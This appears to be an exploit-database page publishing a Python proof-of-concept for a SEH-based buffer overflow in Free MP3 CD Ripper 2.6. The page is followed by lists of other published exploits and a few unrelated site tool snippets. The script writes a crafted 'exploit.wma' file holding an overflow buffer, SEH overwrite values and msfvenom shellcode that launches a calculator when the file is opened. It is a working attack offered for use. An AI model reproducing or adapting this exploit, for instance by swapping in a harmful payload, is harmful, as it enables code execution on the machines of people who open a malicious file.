Menu

Search for hundreds of thousands of exploits

"Free MP3 CD Ripper 2.6 - '.wma' Local Buffer Overflow (SEH)"

Author

Exploit author

"Gionathan Reale"

Platform

Exploit platform

windows_x86

Release date

Exploit published date

2018-09-14

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
# Exploit Title: Free MP3 CD Ripper 2.6 - '.wma' Buffer Overflow (SEH)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-09-13
# Software Link: http://www.commentcamarche.net/download/telecharger-34082200-free-mp3-cd-ripper
# Tested on OS: Windows 7 32bit
# Tested Version: 2.6
# Steps to Reproduce: 
# Run the python exploit script, it will create a new file with the name "exploit.wma". 
# Start the program and click on "Convert". 
# Find the file "exploit.wma" and click "Open" 
# You will see a calculator poped up.
  
#!/usr/bin/python  
    
buffer = "A" * 4116
 
NSEH = "\xeb\x06\x90\x90"
 
SEH = "\x21\x21\xe4\x66"
nops = "\x90" * 8
#badchar \x00\x0a\x0d\x2f
#msfvenom calculator
buf =  ""
buf += "\xba\x9a\x98\xaf\x7e\xdd\xc2\xd9\x74\x24\xf4\x5f\x29"
buf += "\xc9\xb1\x31\x83\xc7\x04\x31\x57\x0f\x03\x57\x95\x7a"
buf += "\x5a\x82\x41\xf8\xa5\x7b\x91\x9d\x2c\x9e\xa0\x9d\x4b"
buf += "\xea\x92\x2d\x1f\xbe\x1e\xc5\x4d\x2b\x95\xab\x59\x5c"
buf += "\x1e\x01\xbc\x53\x9f\x3a\xfc\xf2\x23\x41\xd1\xd4\x1a"
buf += "\x8a\x24\x14\x5b\xf7\xc5\x44\x34\x73\x7b\x79\x31\xc9"
buf += "\x40\xf2\x09\xdf\xc0\xe7\xd9\xde\xe1\xb9\x52\xb9\x21"
buf += "\x3b\xb7\xb1\x6b\x23\xd4\xfc\x22\xd8\x2e\x8a\xb4\x08"
buf += "\x7f\x73\x1a\x75\xb0\x86\x62\xb1\x76\x79\x11\xcb\x85"
buf += "\x04\x22\x08\xf4\xd2\xa7\x8b\x5e\x90\x10\x70\x5f\x75"
buf += "\xc6\xf3\x53\x32\x8c\x5c\x77\xc5\x41\xd7\x83\x4e\x64"
buf += "\x38\x02\x14\x43\x9c\x4f\xce\xea\x85\x35\xa1\x13\xd5"
buf += "\x96\x1e\xb6\x9d\x3a\x4a\xcb\xff\x50\x8d\x59\x7a\x16"
buf += "\x8d\x61\x85\x06\xe6\x50\x0e\xc9\x71\x6d\xc5\xae\x8e"
buf += "\x27\x44\x86\x06\xee\x1c\x9b\x4a\x11\xcb\xdf\x72\x92"
buf += "\xfe\x9f\x80\x8a\x8a\x9a\xcd\x0c\x66\xd6\x5e\xf9\x88"
buf += "\x45\x5e\x28\xeb\x08\xcc\xb0\xc2\xaf\x74\x52\x1b"
pad = "B" * (4440 - len(NSEH) - len(SEH) - len(buffer) - len(nops) - len(buf) )
 
payload = buffer + NSEH + SEH + nops + buf + pad
try:
    f=open("exploit.wma","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2019-11-19 "Microsoft Windows 7 (x86) - 'BlueKeep' Remote Desktop Protocol (RDP) Remote Windows Kernel Use After Free" remote windows_x86 0xeb-bp
2019-07-19 "MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)" remote windows_x86 sasaga92
2019-05-08 "Google Chrome 72.0.3626.119 - 'FileReader' Use-After-Free (Metasploit)" remote windows_x86 Metasploit
2019-01-02 "Ayukov NFTP FTP Client 2.0 - Buffer Overflow" local windows_x86 "Uday Mittal"
2018-12-27 "Iperius Backup 5.8.1 - Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-27 "MAGIX Music Editor 3.1 - Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-27 "Terminal Services Manager 3.1 - Local Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-27 "ShareAlarmPro 2.1.4 - Denial of Service (PoC)" dos windows_x86 T3jv1l
2018-12-27 "Product Key Explorer 4.0.9 - Denial of Service (PoC)" dos windows_x86 T3jv1l
2018-12-27 "NetShareWatcher 1.5.8 - Denial of Service (PoC)" dos windows_x86 T3jv1l
Release Date Title Type Platform Author
2019-03-21 "Canarytokens 2019-03-01 - Detection Bypass" dos windows "Gionathan Reale"
2019-03-15 "Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities" webapps php "Gionathan Reale"
2019-03-13 "pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting" webapps php "Gionathan Reale"
2019-03-12 "PilusCart 1.4.1 - Cross-Site Request Forgery (Add Admin)" webapps php "Gionathan Reale"
2018-12-11 "LanSpy 2.0.1.159 - Local Buffer Overflow (PoC)" dos windows "Gionathan Reale"
2018-12-09 "Textpad 8.1.2 - Denial Of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-26 "TransMac 12.2 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-26 "CrossFont 7.5 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-25 "Faleemi Desktop Software 1.8.2 - 'Device alias' Local Buffer Overflow (SEH)" local windows_x86 "Gionathan Reale"
2018-09-17 "XAMPP Control Panel 3.2.2 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-14 "Faleemi Plus 1.0.2 - Denial of Service (PoC)" dos windows_x86-64 "Gionathan Reale"
2018-09-14 "Free MP3 CD Ripper 2.6 - '.wma' Local Buffer Overflow (SEH)" local windows_x86 "Gionathan Reale"
2018-09-14 "InfraRecorder 0.53 - '.txt' Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-13 "Free MP3 CD Ripper 2.6 - '.mp3' Buffer Overflow (SEH)" local windows_x86 "Gionathan Reale"
2018-09-13 "Faleemi Desktop Software 1.8.2 - 'SavePath for ScreenShots' Buffer Overflow (SEH)" local windows "Gionathan Reale"
2018-09-12 "PixGPS 1.1.8 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-12 "PDF Explorer 1.5.66.2 - Denial of Service (PoC)" dos windows "Gionathan Reale"
2018-09-12 "jiNa OCR Image to Text 1.0 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-12 "PicaJet FX 2.6.5 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-12 "iCash 7.6.5 - Denial of Service (PoC)" dos windows "Gionathan Reale"
2018-09-12 "RoboImport 1.2.0.72 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-12 "Infiltrator Network Security Scanner 4.6 - Denial of Service (PoC)" dos windows "Gionathan Reale"
2018-09-10 "Zenmap (Nmap) 7.70 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-07 "iSmartViewPro 1.5 - 'SavePath for ScreenShots' Local Buffer Overflow (SEH)" local windows_x86 "Gionathan Reale"
2018-08-29 "Drive Power Manager 1.10 - Denial Of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-08-29 "Fathom 2.4 - Denial Of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-08-29 "Immunity Debugger 1.85 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-08-29 "Easy PhotoResQ 1.0 - Denial Of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-08-29 "HD Tune Pro 5.70 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-08-23 "StyleWriter 4 1.0 - Denial of Service (PoC)" local windows_x86 "Gionathan Reale" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected